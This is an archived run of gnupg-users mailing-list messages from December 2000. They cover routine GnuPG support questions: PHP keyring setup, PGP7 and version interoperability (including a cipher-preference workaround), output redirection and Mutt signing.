sorry for my prolificness today. I'm getting used to the tone of the mailing list. To gnupg-users@gnupg.org --- please cc: me as I am not on the list, and answer my question about S/Key integration into GnuPG, and leave out cc:misc@openbsd.org unless you have a "yes" answer. -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From jant@pluto.ncdgroep.nl Tue Dec 12 21:10:41 2000 From: jant@pluto.ncdgroep.nl (Jan-Tiddo) Date: Tue, 12 Dec 2000 22:10:41 +0100 Subject: GPG 1.0.4 and PGP7 Message-ID: <20001212221041.A3870@pluto.ncdgroep.nl> --Kj7319i9nmIyA2yE Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Hello, Please a CC to my address for replies. Thanx. When I send a pgp/gpg messages with mutt 1.2 (default sample source for mutt) to a window client with pgp7, I can't open the pgp attachment. Windows is talking about "Can't find PGP information in file" (or something like that). Anyone a similar experience and sollution? Regards, Jan-Tiddo. --Kj7319i9nmIyA2yE Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (GNU/Linux) Comment: For info see http://www.gnupg.org iEYEARECAAYFAjo2lE8ACgkQFJHobCIs4Q44iwCdE0n5z0Zh/AYPr17PXojdeeEM aS4AoMbfy66calc/7U0z1xSMrmYzxqgN =2be5 -----END PGP SIGNATURE----- --Kj7319i9nmIyA2yE-- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From tbeidler@mindspring.com Tue Dec 12 21:30:21 2000 From: tbeidler@mindspring.com (Tom Beidler) Date: Tue, 12 Dec 2000 13:30:21 -0800 Subject: newbie question "Public key not found" with PHP Message-ID: Please CC me. I'm not sure if I'm subscribed yet. I'm having problems using GNUPG for the first time. I'm using it with PHP and I'll show you my code; // Set directory for "www"'s key ring putenv("GNUPGHOME=/var/www/.gnupg"); // Dump email message into indata file $fp = fopen("/usr/home/dogma/temp/indata", "w+"); fputs($fp, $msg); fclose($fp); // encrypt system("/usr/local/bin/gpg --encrypt -ao /usr/home/dogma/temp/outdata -r 'Joe Schmoe ' /usr/home/dogma/temp/indata "); unlink("/usr/home/dogma/temp/indata"); $crypted = "/usr/home/dogma/temp/outdata"; $fd = fopen($crypted, "r"); $mail_cont = fread($fd, filesize($crypted)); fclose($fd); unlink("$crypted"); I keep getting "Public key not found". The key lines are the "putenv" which is the directory of the PHP users key ring and "system" which is the actual command line. I've tried several variations of the public key, ie. 'Joe', 'Joe Schmoe', 'jschmoe@building.com'. I've tried telneting in as myself and encrypting something and I get the samething. When I --check-ring it shows that I have both my private and public key. Any help would be appreciated. Thanks, Tom >>.>>.>>>.>>>>>.>>>>>>>>> Tom Beidler Orbit Tech Services 805.455.7119 (cell) 805.682.8972 (phone) 805.682.5833 (fax) tbeidler@mindspring.com >>.>>.>>>.>>>>>.>>>>>>>>> -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From turfdog@planetturf.ca Wed Dec 13 01:58:01 2000 From: turfdog@planetturf.ca (Derek Vokey) Date: Tue, 12 Dec 2000 17:58:01 -0800 Subject: newbie question "Public key not found" with PHP References: Message-ID: <000401c064a8$23053100$01a800c0@derekvok> How did you set it up - running under your username or under the PHP user "nobody"? If you access it with php it wants "nobody's" keyring. I set it all up through scripts like so: (easy as all heck) &1",$e)."
"; echo "response to --gen-key:
"; while( $res=each($e) ) { echo "$res[1]
"; } ?> then run &1",$e)."
"; echo "
response to import:
"; while( $res=each($e) ) { echo "$res[1]
"; } ?> I also tried setting the environment variable as well and that works too. I hope you find some of this useful, Derek To the group -> This is a great program but i think that it would be helpful to have another mailing list dedicated to CGI so as to separate these issues from the critical encryption issues. Any takers? ----- Original Message ----- From: "Tom Beidler" To: Sent: Tuesday, December 12, 2000 1:30 PM Subject: newbie question "Public key not found" with PHP > Please CC me. I'm not sure if I'm subscribed yet. > > I'm having problems using GNUPG for the first time. I'm using it with PHP > and I'll show you my code; > > // Set directory for "www"'s key ring > putenv("GNUPGHOME=/var/www/.gnupg"); > > // Dump email message into indata file > $fp = fopen("/usr/home/dogma/temp/indata", "w+"); > fputs($fp, $msg); > fclose($fp); > > // encrypt > system("/usr/local/bin/gpg --encrypt -ao /usr/home/dogma/temp/outdata -r > 'Joe Schmoe ' /usr/home/dogma/temp/indata "); > > unlink("/usr/home/dogma/temp/indata"); > > $crypted = "/usr/home/dogma/temp/outdata"; > > $fd = fopen($crypted, "r"); > $mail_cont = fread($fd, filesize($crypted)); > fclose($fd); > > unlink("$crypted"); > > I keep getting "Public key not found". The key lines are the "putenv" which > is the directory of the PHP users key ring and "system" which is the actual > command line. I've tried several variations of the public key, ie. 'Joe', > 'Joe Schmoe', 'jschmoe@building.com'. > > I've tried telneting in as myself and encrypting something and I get the > samething. When I --check-ring it shows that I have both my private and > public key. > > Any help would be appreciated. > > Thanks, > Tom > > >>.>>.>>>.>>>>>.>>>>>>>>> > Tom Beidler > Orbit Tech Services > 805.455.7119 (cell) > 805.682.8972 (phone) > 805.682.5833 (fax) > tbeidler@mindspring.com > >>.>>.>>>.>>>>>.>>>>>>>>> > > > -- > Archive is at http://lists.gnupg.org - Unsubscribe by sending mail > with a subject of "unsubscribe" to gnupg-users-request@gnupg.org > -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From graham@todd276.worldonline.co.uk Wed Dec 13 02:42:08 2000 From: graham@todd276.worldonline.co.uk (Graham) Date: Wed, 13 Dec 2000 02:42:08 GMT Subject: GPG 1.0.4 and PGP7 In-Reply-To: <20001212221041.A3870@pluto.ncdgroep.nl> References: <20001212221041.A3870@pluto.ncdgroep.nl> Message-ID: <20001213024030.F4E5.GRAHAM@todd276.worldonline.co.uk> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hi there, Jan-Tiddo, On 12 December 2000, I received the following message from you regarding "GPG 1.0.4 and PGP7" J> Hello, J> J> Please a CC to my address for replies. Thanx. J> J> When I send a pgp/gpg messages with mutt 1.2 (default sample source for J> mutt) to a window client with pgp7, I can't open the pgp attachment. J> Windows is talking about "Can't find PGP information in file" (or J> something like that). J> J> Anyone a similar experience and sollution? Which Windows client? And did you send PGP/MIME? Graham reply to: graham@todd276.worldonline.co.uk Please PGP/GnuPG sign mail for verification and encrypt for internet security Written on 13 December 2000 02:40:30 -----BEGIN PGP SIGNATURE----- Version: PGPB2 version 0.01.3 iQA/AwUBOjbh/C7i2PqZ2xC9EQKp0ACfVZkH1givNzc54Q3rMVtbxrowDPEAoPX3 lGD4+I++JrwoSyjFkPmSOxCn =jesH -----END PGP SIGNATURE----- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From donfede@casagrau.org Wed Dec 13 03:02:28 2000 From: donfede@casagrau.org (Federico Grau) Date: Tue, 12 Dec 2000 22:02:28 -0500 Subject: option for viewing by recipient only Message-ID: <20001212220228.E1120@casagrau.org> Hello folks, I have looked through the faq, searched the mailing list, and checked with the RFC with no answer yet, so I come to you. There is an option in pgp 6.5 (the 'free' unix command line version) that allows a person encrypting the message to "mark it for viewing by recipient only". The command line option is "pgp -sem ". Documentation of it can be found on page 39 of the _PGP Command Line - Freeare User's Guide Version 6.5_. Is there such an option for gpg? Are there plans to implement such an option in gpg... if not how much effort should it be? thanks, donfede ps. If people were interested, I need this because I have an script sending encrypted emails with credit card information to a person on a mac using some version of pgp and eudora. The recipient is able to decrypt the email with no problem, however if the user is not careful (and as we know they too often are not) they can save the UNENCRYPTED email... no only leaving sensitive information on their machine, but also loosing/replacing the encrypted version (so its not even a matter of deleting the sensitive unencrypted versions). I understand that this "secure viewing option" is not failsafe and of course a dedicated person can still make a permanent copy of the unencrypted text, however it will make it more difficult for simple mistakes to happen. -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From e.sanchez@maximiles.com Wed Dec 13 08:44:18 2000 From: e.sanchez@maximiles.com (=?iso-8859-1?Q?Eduardo_S=E1nchez?=) Date: Wed, 13 Dec 2000 09:44:18 +0100 Subject: Problems with gnupg Message-ID: Hi, I´m having the trouble when I try to open this file. This file is cripted with NT version and trying to uncript it with linux. I get this message. Do you have any idea why ? gpg: invalid radix64 character 00 skipped -----BEGIN PGP MESSAGE----- Version: GnuPG v1.0.2 (MingW32) Comment: For info see http://www.gnupg.org hQEOA2FZtT52w6+7EAQAgPJ7ilBiSPpdYvpxqtWTwxomixdzVsRTycq6y6o7YeuR RMJ1bBW95zxZCqLfUjOoV7ArJO/bX/Cnqg38VxAkKrn/gT6M/mDEThRD+KjYoe0u 5G0TtZ4Ofa1EUdrjxdv42UV710otmokdxLOAXAjDZFLApW6z7IEfnPH9WebXUJAD /R7dNN70a1jH3rerelcpverEmdsZw2EoGqVh/ikFIO2rlVAFLa8UuVIIMIxnX6hT FdZ8KgYU6RtGtasZ/Ewmio8lI4fkmAtIvQFqLPCzKaEGvfJmsDeV5iBnV48JzHld 6loon0+m0RtvpcC2ABoN+sCYoAtYWIMeg1KP8igASZ+FycA04ZsUt8rVk+X3hT/f N/GX4zxIBrG1fs4X+hFg+NfVrjEARw79BqNk9liE42gH91XNnqKN1dW3ahZ3Oh/A Y8e/DcN5R9rhjUbA85FIMJyrBebNCDbNJKoGDfHFWniifnQj859A3yqqXngrSBzH 8o93l25+Ox28vaVnN2jceGvw3NY/dnDIL6aMuHldvt0SOKFILKTq02jQGyHDDAxl z9iYMY2lDPlWcKbmNy1aqRwK3p6MD7/Ld49fj9zPnq114G8xATLcueRHm9fs5aiO M+9gwIqtw99i9jqdn4y4FAJKcA0RuhtWETmPvwj07IPPMxFRbdmZfg== =5J2m -----END PGP MESSAGE----- Do you have any idea why ? Thanks so much for your help This is the message.... -----BEGIN PGP MESSAGE----- Version: GnuPG v1.0.2 (MingW32) Comment: For info see http://www.gnupg.org hQEOA2FZtT52w6+7EAQAgPJ7ilBiSPpdYvpxqtWTwxomixdzVsRTycq6y6o7YeuR RMJ1bBW95zxZCqLfUjOoV7ArJO/bX/Cnqg38VxAkKrn/gT6M/mDEThRD+KjYoe0u 5G0TtZ4Ofa1EUdrjxdv42UV710otmokdxLOAXAjDZFLApW6z7IEfnPH9WebXUJAD /R7dNN70a1jH3rerelcpverEmdsZw2EoGqVh/ikFIO2rlVAFLa8UuVIIMIxnX6hT FdZ8KgYU6RtGtasZ/Ewmio8lI4fkmAtIvQFqLPCzKaEGvfJmsDeV5iBnV48JzHld 6loon0+m0RtvpcC2ABoN+sCYoAtYWIMeg1KP8igASZ+FycA04ZsUt8rVk+X3hT/f N/GX4zxIBrG1fs4X+hFg+NfVrjEARw79BqNk9liE42gH91XNnqKN1dW3ahZ3Oh/A Y8e/DcN5R9rhjUbA85FIMJyrBebNCDbNJKoGDfHFWniifnQj859A3yqqXngrSBzH 8o93l25+Ox28vaVnN2jceGvw3NY/dnDIL6aMuHldvt0SOKFILKTq02jQGyHDDAxl z9iYMY2lDPlWcKbmNy1aqRwK3p6MD7/Ld49fj9zPnq114G8xATLcueRHm9fs5aiO M+9gwIqtw99i9jqdn4y4FAJKcA0RuhtWETmPvwj07IPPMxFRbdmZfg== =5J2m -----END PGP MESSAGE----- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From Peter.Bloecher@eed.ericsson.se Wed Dec 13 12:37:48 2000 From: Peter.Bloecher@eed.ericsson.se (Peter Bloecher (EED)) Date: Wed, 13 Dec 2000 13:37:48 +0100 Subject: gnupg 1.0.4 <-> 1.0.0 interoperability problem Message-ID: <3A376D9C.49D13756@eed.ericsson.se> Hello, After upgrading to gpg 1.0.4 I discovered a problem when exchanging messages with people using gpg 1.0.0. What happens is that during decryption they are asked to enter their private key, but then no decrypted output is produced. No message is printed, either -- just nothing happens. gpg 1.0.4 can decrypt the message without problem. [this is all happening on SunOS 5.6 = Solaris 2.6] Calling gpg 1.0.0 with --list-packets results in :pubkey enc packet: version 3, algo 16, keyid 274336D3E7F40A9D data: [1022 bits] data: [1022 bits] :unknown packet: type 18, length 0 dump: 01 e2 83 8e 36 0d 30 d7 2f cb 17 29 48 b1 9d b3 99 02 57 b4 90 51 73 48 24: 38 f6 32 c7 de 14 3d ee e8 ee 46 90 5a da 91 4a 6d 59 d1 71 15 03 35 07 (dunp continues) Calling gpg 1.0.4 with --list-packets gives :pubkey enc packet: version 3, algo 16, keyid 274336D3E7F40A9D data: [1022 bits] data: [1022 bits] :encrypted data packet: length: 4294967295 mdc_method: 2 :compressed packet: algo=2 :literal data packet: mode b, created 976709893, name="testtext", raw data: 1420 bytes The length field of the encrypted packet looks suspicious, but that does not have to be connected to the problem. I am able to reproduce the problem with test data and a test key. They are available on request. Just upgrading everybody to 1.0.4 does not seem reasonable. I also fear that there might be interoperability problems with, e.g., PGP. Any advice? Best regards, /Peter PS: Please CC me on any answer - I'm not subscribed to the list -- Peter Bloecher, Ericsson Research Speech & Signal Processing Ericsson Eurolab Deutschland GmbH Tel: +49 911 5217-307 Nordostpark 12 Fax: +49 911 5217-961 D-90411 Nuernberg mailto:Peter.Bloecher@eed.ericsson.se -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From stephan.stapel@tu-clausthal.de Wed Dec 13 12:54:00 2000 From: stephan.stapel@tu-clausthal.de (Stephan Stapel) Date: Wed, 13 Dec 2000 13:54:00 +0100 Subject: public key data output to a file? Message-ID: <000b01c06503$c38feab0$2bf8ae8b@bert> Hi! Is it possible to output the data of a public key to a file? These parameters: gpg --batch --yes --output [File]--edit-key [ID] pref quit Do not do it. Thanks, Stephan -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From ingo@mathA.rwth-aachen.de Wed Dec 13 13:15:56 2000 From: ingo@mathA.rwth-aachen.de (Ingo Kloecker) Date: Wed, 13 Dec 2000 14:15:56 +0100 Subject: public key data output to a file? In-Reply-To: <000b01c06503$c38feab0$2bf8ae8b@bert> References: <000b01c06503$c38feab0$2bf8ae8b@bert> Message-ID: <00121314155601.28035@atlas> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On Wednesday, 13. December 2000 13:54, Stephan Stapel wrote: > Hi! > > Is it possible to output the data of a public key to a file? > These parameters: > > gpg --batch --yes --output [File]--edit-key [ID] pref quit > > Do not do it. Try "gpg --help" or RTFM and look for "export keys"! Regards Ingo - -- Ingo Klöcker Lehrstuhl A für Mathematik RWTH Aachen 52056 Aachen -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE6N3aQqUQWN/hplRsRAkkNAJ40ESVrUEr2mHFrqyeRhZxKDQROnQCfbsG8 3tB1hlnQ6BWNGOJOAzarjhw= =egX5 -----END PGP SIGNATURE----- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From stephan.stapel@tu-clausthal.de Wed Dec 13 13:27:27 2000 From: stephan.stapel@tu-clausthal.de (Stephan Stapel) Date: Wed, 13 Dec 2000 14:27:27 +0100 Subject: public key data output to a file? References: <000b01c06503$c38feab0$2bf8ae8b@bert> <00121314155601.28035@atlas> Message-ID: <000f01c06508$7014d0d0$2bf8ae8b@bert> > Try "gpg --help" or RTFM and look for "export keys"! Oh, sorry, if you misunderstood. I don't want to export the key, I know the commands for this. What I'd like to do is to redirect the display of --edit-key [ID] to a file, things like expiration date, trusts, sub keys. That's all. Therefore I included the sniplet (see original posting). No need to be angry Stephan -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From wk@gnupg.org Wed Dec 13 13:45:24 2000 From: wk@gnupg.org (Werner Koch) Date: Wed, 13 Dec 2000 14:45:24 +0100 Subject: gnupg 1.0.4 <-> 1.0.0 interoperability problem In-Reply-To: <3A376D9C.49D13756@eed.ericsson.se>; from Peter.Bloecher@eed.ericsson.se on Wed, Dec 13, 2000 at 01:37:48PM +0100 References: <3A376D9C.49D13756@eed.ericsson.se> Message-ID: <20001213144524.V21969@gnupg.de> On Wed, 13 Dec 2000, Peter Bloecher (EED) wrote: > After upgrading to gpg 1.0.4 I discovered a problem when exchanging messages > with people using gpg 1.0.0. What happens is that during decryption they are asked Is it the case that the keys of the people using 1.0.0 have neen generated with 1.0.4? Than it is pretty ovious what happens: > Calling gpg 1.0.4 with --list-packets gives > :encrypted data packet: > length: 4294967295 > mdc_method: 2 Since 1.0.3, keys generated with gpg are created with preferences to TWOFISH (and AES since 1.0.4) and that also means that they have the capability to use the new MDC encryption method. This will go into OpenPGP soon and is also suppoted by PGP 7. This new method avoids a (not so new) attack on all email encryption systems. The NEWS for 1.0.3 tell you that there is an incompatibility. > The length field of the encrypted packet looks suspicious, but that does not > have to be connected to the problem. Indeed. It only effects the lising and I will fix it in the next release. > Just upgrading everybody to 1.0.4 does not seem reasonable. I also fear that > there might be interoperability problems with, e.g., PGP. Not if you have the latest PGP (7) - I checked with the PGP developers that MDC works for both of us. As workaround I can suggest to add disable-cipher-algo RIJNDAEL disable-cipher-algo TWOFISH to the options file of gpg 1.0.4. Or foce the use of one cipher without caring about any preferences by using: cipher-algo cast5 IIRC, there is something about it in the FAQ. For security reasons, I'd suggest to upgrade to 1.0.4 anyway. Hth, Werner -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From wk@gnupg.org Wed Dec 13 13:47:43 2000 From: wk@gnupg.org (Werner Koch) Date: Wed, 13 Dec 2000 14:47:43 +0100 Subject: public key data output to a file? In-Reply-To: <000b01c06503$c38feab0$2bf8ae8b@bert>; from stephan.stapel@tu-clausthal.de on Wed, Dec 13, 2000 at 01:54:00PM +0100 References: <000b01c06503$c38feab0$2bf8ae8b@bert> Message-ID: <20001213144743.W21969@gnupg.de> On Wed, 13 Dec 2000, Stephan Stapel wrote: > Is it possible to output the data of a public key to a file? > These parameters: > > gpg --batch --yes --output [File]--edit-key [ID] pref quit I am not sure whether you can get the preferences easily. As a workaround you might want to do a --list-packets on the key and parse that output. It seems like a good idea to add this to the listing. Werner -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From wk@gnupg.org Wed Dec 13 14:12:53 2000 From: wk@gnupg.org (Werner Koch) Date: Wed, 13 Dec 2000 15:12:53 +0100 Subject: public key data output to a file? In-Reply-To: <000f01c06508$7014d0d0$2bf8ae8b@bert>; from stephan.stapel@tu-clausthal.de on Wed, Dec 13, 2000 at 02:27:27PM +0100 References: <000b01c06503$c38feab0$2bf8ae8b@bert> <00121314155601.28035@atlas> <000f01c06508$7014d0d0$2bf8ae8b@bert> Message-ID: <20001213151253.Z21969@gnupg.de> Hi forgot to mention this: script(1) and awk(1) are your friends Werner -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From Peter.Bloecher@eed.ericsson.se Wed Dec 13 15:50:01 2000 From: Peter.Bloecher@eed.ericsson.se (Peter Bloecher (EED)) Date: Wed, 13 Dec 2000 16:50:01 +0100 Subject: gnupg 1.0.4 <-> 1.0.0 interoperability problem References: <3A376D9C.49D13756@eed.ericsson.se> <20001213144524.V21969@gnupg.de> Message-ID: <3A379AA9.834BB4EE@eed.ericsson.se> Hello Werner (CC all), Werner Koch wrote: > Is it the case that the keys of the people using 1.0.0 have neen > generated with 1.0.4? Than it is pretty ovious what happens: Not really. I think I actually did that for the example, but the key of the person who encountered the problem was definitely generated with 1.0.0 (since they do not have 1.0.4, which is why we have the problem). > > > Calling gpg 1.0.4 with --list-packets gives > > > :encrypted data packet: > > length: 4294967295 > > mdc_method: 2 > > Since 1.0.3, keys generated with gpg are created with preferences to > TWOFISH (and AES since 1.0.4) and that also means that they have the > capability to use the new MDC encryption method. This will go into > OpenPGP soon and is also suppoted by PGP 7. This new method avoids > a (not so new) attack on all email encryption systems. > > The NEWS for 1.0.3 tell you that there is an incompatibility. Sorry for not reading that. I dug around for a while in the newsgroup and the BUG list. > > > The length field of the encrypted packet looks suspicious, but that does not > > have to be connected to the problem. > > Indeed. It only effects the lising and I will fix it in the next > release. Fine. > > > Just upgrading everybody to 1.0.4 does not seem reasonable. I also fear that > > there might be interoperability problems with, e.g., PGP. > > Not if you have the latest PGP (7) - I checked with the PGP > developers that MDC works for both of us. If I decode this correctly: The problem is caused by pgp 1.0.4 using an encryption method (?) called MDC, which is not supported by 1.0.0. Correct? For some reason, that method was used even when I encrypted with a key that was generated with gpg 1.0.0. Right? [The preferences for that key are: S10 S4 S3 H3 H2 Z2 Z1] > > As workaround I can suggest to add > > disable-cipher-algo RIJNDAEL > disable-cipher-algo TWOFISH > > to the options file of gpg 1.0.4. Or foce the use of one cipher > without caring about any preferences by using: > > cipher-algo cast5 That seems to work. Thanks a lot for your help. (and I will continue to ask the other people to upgrade ;-) ) > > IIRC, there is something about it in the FAQ. For security reasons, > I'd suggest to upgrade to 1.0.4 anyway. I did not find anything in the FAQ. Best regards, /Peter -- Peter Bloecher, Ericsson Research Speech & Signal Processing Ericsson Eurolab Deutschland GmbH Tel: +49 911 5217-307 Nordostpark 12 Fax: +49 911 5217-961 D-90411 Nuernberg mailto:Peter.Bloecher@eed.ericsson.se -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From rich@cnylug.org Wed Dec 13 16:00:42 2000 From: rich@cnylug.org (Rich) Date: Wed, 13 Dec 2000 11:00:42 -0500 Subject: Error message Message-ID: <3A379D2A168.3FA1RICH@mail.dreamscape.com> Hi Werner, I grabbed that Cyngin version of GPG and have been fooling around with it, and I keep getting this error message: --------- gpg: can't mmap pool of 16384 bytes: Invalid argument - using malloc --------- The program sill functioned however. I figured I'd mention it in case you had any info for him regarding this. Rich... ________________________________________ The Central New York Linux User Group Now with one of them web page thingies! www.cnylug.org <-> rich@XXXcnylug.org -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From stefan@epy.co.at Wed Dec 13 17:29:20 2000 From: stefan@epy.co.at (Stefan H. Holek) Date: Wed, 13 Dec 2000 18:29:20 +0100 (CET) Subject: Problems with gnupg In-Reply-To: Message-ID: On Wed, 13 Dec 2000, Eduardo Sánchez wrote: > gpg: invalid radix64 character 00 skipped > Thats what I get: gpg: encrypted with ELG-E key, ID 76C3AFBB gpg: no secret key for decryption available gpg: decryption failed: secret key not available So for me it's ok. Make sure your client progs are configured properly and you don't introduce some unwanted whitespace, linebreak characters, or whatever. HTH, Stefan -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From stephan.stapel@tu-clausthal.de Wed Dec 13 18:04:40 2000 From: stephan.stapel@tu-clausthal.de (Stephan Stapel) Date: Wed, 13 Dec 2000 19:04:40 +0100 Subject: public key data output to a file? References: <000b01c06503$c38feab0$2bf8ae8b@bert> <20001213144743.W21969@gnupg.de> Message-ID: <001d01c0652f$2a0346e0$2bf8ae8b@bert> > > Is it possible to output the data of a public key to a file? > > gpg --batch --yes --output [File]--edit-key [ID] pref quit > I am not sure whether you can get the preferences easily. As a > workaround you might want to do a --list-packets on the key and > parse that output. It seems like a good idea to add this to the > listing. Sorry, but could you please (no RTFM please :-))= ) tell me how to use the list-packets command? And for this list, why can't I simply redirect the output to a file: gpg --batch --edit-key [ID] pref quit 1> c:\test.txt This would do it for me! cheers, Stephan -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From bkeitch@ow61.openworld.co.uk Wed Dec 13 18:10:29 2000 From: bkeitch@ow61.openworld.co.uk (Ben Keitch) Date: Wed, 13 Dec 2000 18:10:29 GMT Subject: Possible bug? Message-ID: <200012131810.SAA19368@ow61.openworld.co.uk> Please CC me, as I am not on your list. We have just upgraded to 1.0.4 and have noticed the following warning: gpg: this cipher algorithm is depreciated; please use a more standard one! This only occurs on encryption with a key generated with a local copy of gpg. Using a key generated with another copy of gpg-1.0.4 on another (reasonably identical) machine doesn't cause this problem. Firstly what does this warning mean? Unfortunatley we can not use gpg with this warning occuring, as it breaks our scripts. Secondly why does it only occur in the manner described? My only thought is that the signing process is what is causing this warning. We run on Slackware 7.0 Linux on Intel 386. I can send you any other information you need, but I don't know what is relevant. We are using Diffie Hellman keys i.e. ElGamal. In the mean time we are having to use gpg-1.0.1 as it is the last working version. Thank you in advance for your help. Ben Keitch Open World Developer -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From bryan@bryansweb.com Wed Dec 13 19:37:41 2000 From: bryan@bryansweb.com (Bryan K. Walton) Date: Wed, 13 Dec 2000 13:37:41 -0600 Subject: question regarding gnupg in my regular signature In-Reply-To: <200012131845.eBDIj0705197@mail.hsp.de>; from gnupg-users-request@gnupg.org on Wed, Dec 13, 2000 at 07:45:00PM +0100 References: <20001213124142.C31174@berbee.com> <200012131842.eBDIg2Y05044@mail.hsp.de> <20001213124440.D31174@berbee.com> <200012131845.eBDIj0705197@mail.hsp.de> Message-ID: <20001213133740.A31330@berbee.com> Greetings to the list. I am relatively new to GPG and am trying to get it configured with Mutt like I want it. I have a question regarding adding my GPG signature to my regular email signature (such as below). Is it Ok to do this? Do many people do this? Are there any negatives to doing this? I have noticed that if I sign my emails, using the Mutt autosign feature, that some folks using email programs like Eudora receive my gpg signature in the form of an attachment that their email program doens't know how to read. What is the real difference between signing my emails, and just sending a copy of my signature in the email signature line? I hope that my question makes sense. Thanks, Bryan Walton -- Bryan K. Walton Network Operations Center Analyst Berbee 5520 Research Park Drive Madison, Wisconsin 53711 608.288.4000 -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From rodneyp@utanet.at Wed Dec 13 23:33:02 2000 From: rodneyp@utanet.at (Rod Pike) Date: Wed, 13 Dec 2000 21:33:02 -0200 Subject: How to subscribe to this mailing list. Message-ID: <3A38072E.6F03305F@utanet.at> Sorry for the dumb question but could someone CC me with the details on how to subscribe. Cheers, -- Rod Pike rodneyp @ utanet.at -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From bryan@bryansweb.com Wed Dec 13 20:36:55 2000 From: bryan@bryansweb.com (Bryan K. Walton) Date: Wed, 13 Dec 2000 14:36:55 -0600 Subject: question regarding gnupg in my regular signature In-Reply-To: <20001213133740.A31330@berbee.com>; from bryan@bryansweb.com on Wed, Dec 13, 2000 at 01:37:41PM -0600 References: <20001213124142.C31174@berbee.com> <200012131842.eBDIg2Y05044@mail.hsp.de> <20001213124440.D31174@berbee.com> <200012131845.eBDIj0705197@mail.hsp.de> <20001213133740.A31330@berbee.com> Message-ID: <20001213143655.B31330@berbee.com> OK, more research has helped me to understand what I am looking for. I think what I am wanting to do is send "clearsign" my emails. Now, if I can only figure out how to get Mutt to do this automatically. Thanks, Bryan On Wed, Dec 13, 2000 at 01:37:41PM -0600, Bryan K. Walton wrote: > Greetings to the list. I am relatively new to GPG and am trying to get it configured with Mutt like I want it. I have a question regarding adding my GPG signature to my regular email signature (such as below). Is it Ok to do this? Do many people do this? Are there any negatives to doing this? I have noticed that if I sign my emails, using the Mutt autosign feature, that some folks using email programs like Eudora receive my gpg signature in the form of an attachment that their email program doens't know how to read. > What is the real difference between signing my emails, and just sending a copy of my signature in the email signature line? > I hope that my question makes sense. > > Thanks, > Bryan Walton > > -- > Bryan K. Walton > Network Operations Center Analyst > Berbee > 5520 Research Park Drive Madison, Wisconsin 53711 > 608.288.4000 > > -- > Archive is at http://lists.gnupg.org - Unsubscribe by sending mail > with a subject of "unsubscribe" to gnupg-users-request@gnupg.org -- Bryan K. Walton Network Operations Center Analyst Berbee 5520 Research Park Drive Madison, Wisconsin 53711 608.288.4000 Berbee...putting the E in business -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From hap@rumms.uni-mannheim.de Wed Dec 13 21:15:10 2000 From: hap@rumms.uni-mannheim.de (dollhopf) Date: Wed, 13 Dec 2000 22:15:10 +0100 (MET) Subject: keyserver portnumber Message-ID: <200012132115.eBDLFAM12436@rumms.uni-mannheim.de> (how) can I tell gpg if the keyserver portnumber is not default? does something exist like `gpg --keyserver testwwwkeys --port 1389 ...' ? peter -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From andrew@mcdonald.org.uk Wed Dec 13 21:41:01 2000 From: andrew@mcdonald.org.uk (Andrew McDonald) Date: Wed, 13 Dec 2000 21:41:01 +0000 Subject: question regarding gnupg in my regular signature In-Reply-To: <20001213143655.B31330@berbee.com>; from bryan@bryansweb.com on Wed, Dec 13, 2000 at 02:36:55PM -0600 References: <20001213124142.C31174@berbee.com> <200012131842.eBDIg2Y05044@mail.hsp.de> <20001213124440.D31174@berbee.com> <200012131845.eBDIj0705197@mail.hsp.de> <20001213133740.A31330@berbee.com> <20001213143655.B31330@berbee.com> Message-ID: <20001213214101.A264@mcdonald.org.uk> --ikeVEW9yuYc//A+q Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Wed, Dec 13, 2000 